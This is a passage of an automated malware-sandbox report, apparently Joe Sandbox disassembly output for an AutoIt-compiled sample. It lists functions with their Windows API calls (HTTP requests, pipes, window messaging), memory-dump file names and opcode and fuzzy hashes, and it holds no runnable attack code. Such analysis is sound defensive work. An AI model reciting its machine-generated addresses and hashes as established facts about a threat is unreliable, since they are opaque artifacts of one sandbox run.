                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,001B1044,?,?), ref: 00207510
                                                              • Part of subcall function 00206ED7: CloseHandle.KERNEL32(00000000,?,0020751D,?,001B1044,?,?), ref: 00206EE1
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00207523
                                                            • LeaveCriticalSection.KERNEL32(?,?,001B1044,?,?), ref: 0020752A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 1d10bc808a1e351d5b9304474746d811b52c7c8cf94e204e423340e8f849967c
                                                            • Instruction ID: 8a98b78f8da0dd5b1d11cb838a0c69df79d6c33e6bdaa62815046ddd876a4f28
                                                            • Opcode Fuzzy Hash: 1d10bc808a1e351d5b9304474746d811b52c7c8cf94e204e423340e8f849967c
                                                            • Instruction Fuzzy Hash: 18F05E3A540712FBDB611BA4FE8CDEB7B3AEF46302B401631FA02910B5CB755822CB50
                                                            Function 001F8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F8E7F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 001F8E8B
                                                            • CloseHandle.KERNEL32(?), ref: 001F8E94
                                                            • CloseHandle.KERNEL32(?), ref: 001F8E9C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8EA5
                                                            • HeapFree.KERNEL32(00000000), ref: 001F8EAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 895900d18637a6bba3cc9359377d9c4cb135c0fcffb516bb196c57954da36eae
                                                            • Instruction ID: 0b8cbc7c0ef4f93ea6dd52982c189279c3af260e820b133d3d51e05d823c7b76
                                                            • Opcode Fuzzy Hash: 895900d18637a6bba3cc9359377d9c4cb135c0fcffb516bb196c57954da36eae
                                                            • Instruction Fuzzy Hash: 7AE0C236004001FBDA515FE1FE0C95ABB79FB89322B509230F21981070CB329432DB50
                                                            Function 001F7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00232C7C,?), ref: 001F7C32
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00232C7C,?), ref: 001F7C4A
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0022FB80,000000FF,?,00000000,00000800,00000000,?,00232C7C,?), ref: 001F7C6F
                                                            • _memcmp.LIBCMT ref: 001F7C90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,#
                                                            • API String ID: 314563124-1430289482
                                                            • Opcode ID: 0b7f7558ffee7b0b7bcf1cb64f90ad2a7812b9c9c537db3de90176fd9ed372bb
                                                            • Instruction ID: ab2b24e3a1e11feca0902b6842817463570db6151a90fc3f91b4e91b4e433c66
                                                            • Opcode Fuzzy Hash: 0b7f7558ffee7b0b7bcf1cb64f90ad2a7812b9c9c537db3de90176fd9ed372bb
                                                            • Instruction Fuzzy Hash: 23811B75A00109EFCB04DFD4C984EEEB7B9FF89315F204598E506AB290DB71AE06CB60
                                                            Function 00218902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00218928
                                                            • CharUpperBuffW.USER32(?,?), ref: 00218A37
                                                            • VariantClear.OLEAUT32(?), ref: 00218BAF
                                                              • Part of subcall function 00207804: VariantInit.OLEAUT32(00000000), ref: 00207844
                                                              • Part of subcall function 00207804: VariantCopy.OLEAUT32(00000000,?), ref: 0020784D
                                                              • Part of subcall function 00207804: VariantClear.OLEAUT32(00000000), ref: 00207859
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 5225bfc1389a44312ac8b85c59696e3e0e3296b7c7a49d53f7e4d7fd981bfad0
                                                            • Instruction ID: 1c8ab8d0f92aba86140688af550d754723df7a5d4d4a5db9f07b2114ef37a2f4
                                                            • Opcode Fuzzy Hash: 5225bfc1389a44312ac8b85c59696e3e0e3296b7c7a49d53f7e4d7fd981bfad0
                                                            • Instruction Fuzzy Hash: CB916B756183019FC710DF24C4859ABBBF4AFA9314F04896EF89ACB361DB31E985CB52
                                                            Function 00202F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
                                                            • _memset.LIBCMT ref: 00203077
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002030A6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00203159
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00203187
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 41937584acb193d44b8943e43afc2a8d4822557652747ff4e1c41631f3889aa3
                                                            • Instruction ID: 8c331e50710e1e337e1fc79e4c3dd00d0ff428a574d12feebcfbbf2872763907
                                                            • Opcode Fuzzy Hash: 41937584acb193d44b8943e43afc2a8d4822557652747ff4e1c41631f3889aa3
                                                            • Instruction Fuzzy Hash: 5651B4315293029BD725DF28D849A6BB7E8EF59360F04092EF899D31D2DB70CE648752
                                                            Function 00202C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202CAF
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00202CCB
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00202D11
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00266890,00000000), ref: 00202D5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: ce656ce9a15e82f2b7b67d6cd128996f0f6c5efa5709a51add69fe57b9525bda
                                                            • Instruction ID: bef0debc6f9f129bc66d1b01a35032875094ccd9210860f6a6c5f54a7d28142b
                                                            • Opcode Fuzzy Hash: ce656ce9a15e82f2b7b67d6cd128996f0f6c5efa5709a51add69fe57b9525bda
                                                            • Instruction Fuzzy Hash: 1E41C231214302EFD724DF24C848B1AB7E8EF85720F00462EF965972D2D770E918CB92
                                                            Function 0021DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0021DAD9
                                                              • Part of subcall function 001A79AB: _memmove.LIBCMT ref: 001A79F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: df5d037fae8839bfc4255046c943ad6168873b4c5b147ca91706725144043366
                                                            • Instruction ID: a48227025a1b34c4bb0e070a4e5b4ecb9423845b9d484c73bd84bb366cbf4ced
                                                            • Opcode Fuzzy Hash: df5d037fae8839bfc4255046c943ad6168873b4c5b147ca91706725144043366
                                                            • Instruction Fuzzy Hash: C231C37451421AEFCF00EF94CC809FEB3B4FF25324B008629E826976D1DB71AA56CB90
                                                            Function 001F9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001F93F6
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001F9409
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 001F9439
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 592e8930aa31bb5164198ec1c0e789fdf815ce189177c92213b5986e8694e081
                                                            • Instruction ID: e9b7fc39b3d7d70be5e3c73ea67a18aa528355d11b751b9ad2a68277dfa27b00
                                                            • Opcode Fuzzy Hash: 592e8930aa31bb5164198ec1c0e789fdf815ce189177c92213b5986e8694e081
                                                            • Instruction Fuzzy Hash: 782135B5904108BFDB18ABB0DC85DFFB77CDF66360B104129FA21972E1DB354A4A8A60
                                                            Function 00211B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00211B40
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00211B66
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00211B96
                                                            • InternetCloseHandle.WININET(00000000), ref: 00211BDD
                                                              • Part of subcall function 00212777: GetLastError.KERNEL32(?,?,00211B0B,00000000,00000000,00000001), ref: 0021278C
                                                              • Part of subcall function 00212777: SetEvent.KERNEL32(?,?,00211B0B,00000000,00000000,00000001), ref: 002127A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: 72867ca8eb7b3589a6f0bcfb0b69791620d17b69e82d99c288922ff1e90c653f
                                                            • Instruction ID: 5d4ecbaf2991f25b1741bc0528dc550b5724d9afdb5cd09eae7c52f1fa217bdc
                                                            • Opcode Fuzzy Hash: 72867ca8eb7b3589a6f0bcfb0b69791620d17b69e82d99c288922ff1e90c653f
                                                            • Instruction Fuzzy Hash: AE21C571514208BFEB219F509CC5EFFB6FCEB59748F10412AF50592140EB709E655761
                                                            Function 00226656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001A1D73
                                                              • Part of subcall function 001A1D35: GetStockObject.GDI32(00000011), ref: 001A1D87
                                                              • Part of subcall function 001A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A1D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002266D0
                                                            • LoadLibraryW.KERNEL32(?), ref: 002266D7
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002266EC
                                                            • DestroyWindow.USER32(?), ref: 002266F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 33808ced20abfbbf10357a4d27a634501357934f6652c1af2cd30cf6f5a90574
                                                            • Instruction ID: 9063f39b51ecc6c69340584b202814d85af6e468c15437b99764bc7be86b8a8a
                                                            • Opcode Fuzzy Hash: 33808ced20abfbbf10357a4d27a634501357934f6652c1af2cd30cf6f5a90574
                                                            • Instruction Fuzzy Hash: A9219F72120216BFEF104FE4FC88EBB77ADEB59368F104629F911921A0D7B5CC619B60
                                                            Function 0020703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 0020705E
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00207091
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 002070A3
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002070DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 8dddfa4d971ab1ca84a435b2e38449dda9e65553d21f48eaca7a3b73595ed701
                                                            • Instruction ID: eb6a9268467633a9274d6c7b23fc97144a3ef18df2b8b1706856e4d02e4f7b3b
                                                            • Opcode Fuzzy Hash: 8dddfa4d971ab1ca84a435b2e38449dda9e65553d21f48eaca7a3b73595ed701
                                                            • Instruction Fuzzy Hash: 2121817492430AABDB209F68DC09A9A77B9BF55720F204729FCA1D72D1E770A861CB50
                                                            Function 0020710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0020712B
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0020715D
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0020716E
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002071A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: de3b88b7fba90df12759432f328e92768bc04b916d43f5f03752fae6e470dd14
                                                            • Instruction ID: 3e06d7e3893289c096319414d9fadaedc062a087abaf1da0c3af6d865d60c34f
                                                            • Opcode Fuzzy Hash: de3b88b7fba90df12759432f328e92768bc04b916d43f5f03752fae6e470dd14
                                                            • Instruction Fuzzy Hash: 0821B675A14306ABDF209F689C48A99F7F8AF55720F200719FDA5D32D1D770B861CB50
                                                            Function 0020AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020AEBF
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0020AF13
                                                            • __swprintf.LIBCMT ref: 0020AF2C
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0022F910), ref: 0020AF6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: f9302fb07c325754b5390984604dc343aac64da48ada004a370473ec9e07779e
                                                            • Instruction ID: 6c906c1b73fc41a94520ba387383bd8c9bfa6ae788d65c546a57069d37e25f97
                                                            • Opcode Fuzzy Hash: f9302fb07c325754b5390984604dc343aac64da48ada004a370473ec9e07779e
                                                            • Instruction Fuzzy Hash: E6214434600209BFCB10EF94DD89DAE7BB8EF49704B104069F909EB251DB71EA55CB61
                                                            Function 001FA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                              • Part of subcall function 001FA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001FA399
                                                              • Part of subcall function 001FA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 001FA3AC
                                                              • Part of subcall function 001FA37C: GetCurrentThreadId.KERNEL32 ref: 001FA3B3
                                                              • Part of subcall function 001FA37C: AttachThreadInput.USER32(00000000), ref: 001FA3BA
                                                            • GetFocus.USER32 ref: 001FA554
                                                              • Part of subcall function 001FA3C5: GetParent.USER32(?), ref: 001FA3D3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 001FA59D
                                                            • EnumChildWindows.USER32(?,001FA615), ref: 001FA5C5
                                                            • __swprintf.LIBCMT ref: 001FA5DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                            • String ID: %s%d
                                                            • API String ID: 1941087503-1110647743
                                                            • Opcode ID: 8587dbff5ef512c2fc485ddcccf304137baf2b364d7e94f191fdc68af95c911c
                                                            • Instruction ID: 38ab1cba9806de7f1ad9f0e096436983efc4d2a0a19225b1067d269a69e80c48
                                                            • Opcode Fuzzy Hash: 8587dbff5ef512c2fc485ddcccf304137baf2b364d7e94f191fdc68af95c911c
                                                            • Instruction Fuzzy Hash: 171190B1640209BBDF107FA0EC89FFA377CAF59710F444075BA1CAA192CB7459458B75
                                                            Function 00202017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00202048
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
